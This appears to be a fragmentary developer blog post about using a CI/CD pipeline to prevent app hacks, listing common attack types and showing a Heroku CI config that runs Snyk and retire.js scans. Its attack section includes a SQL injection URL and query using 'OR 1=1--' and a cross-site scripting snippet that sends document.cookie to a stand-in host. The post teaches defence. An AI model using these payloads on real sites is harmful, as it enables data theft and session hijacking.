Using Your CI/CD Pipeline To Prevent Your App From Getting Hacked

How Hackers Attack

Injection attacks

https://somewebsite.com/customers?region=South'+OR+1=1--
SELECT * FROM products WHERE category = 'Gifts' OR 1=1 -- ' AND released = 1

Broken authentication

Sensitive data leaks

XML external entities

Broken access control

https://newapp.com/site/get-info
http://newapp.com/site/admin/get-info

Security misconfiguration

Cross-site scripting

<script>
window.location="http://wrongsite.com/?cookie=" + document.cookie
</script>

Insecure deserialization

Using packages with known vulnerabilities

Not enough logging and monitoring

How to Prevent Attacks Using Your CI/CD Pipeline

{
  "buildpacks": [
    {
      "url": "heroku/nodejs"
    }
  ],
  "environments": {
    "test": {
      "scripts": {
        "test-setup": "npm install -g snyk retire",
        "test": "snyk auth $SNYK_TOKEN && snyk test && retire && npm test"
      }
    }
  }
}
Heroku Flow view
Tests running in Heroku CI

Build

Test

Delivery

Other Considerations

  • Optimize your build time to make deploys to production happen quickly. This means keeping a small build size and only using the tools you need.
  • Keep parity across all of your environments. This will help with testing; when developers and QA are testing against staging or other environments, it’s most useful when they are as close to production as possible.
  • Don’t check secrets and credentials into version control. Make sure all PRs go through some kind of review/test to check for this. It’s more difficult to get these out once they’ve been merged in.
  • Make the pipeline the only way to deploy changes to production so that you always know when code changes are released.

Conclusion

Milecia

Starting classes soon! | Software/Hardware Engineer | International tech speaker | Random inventor and slightly mad scientist with extra sauce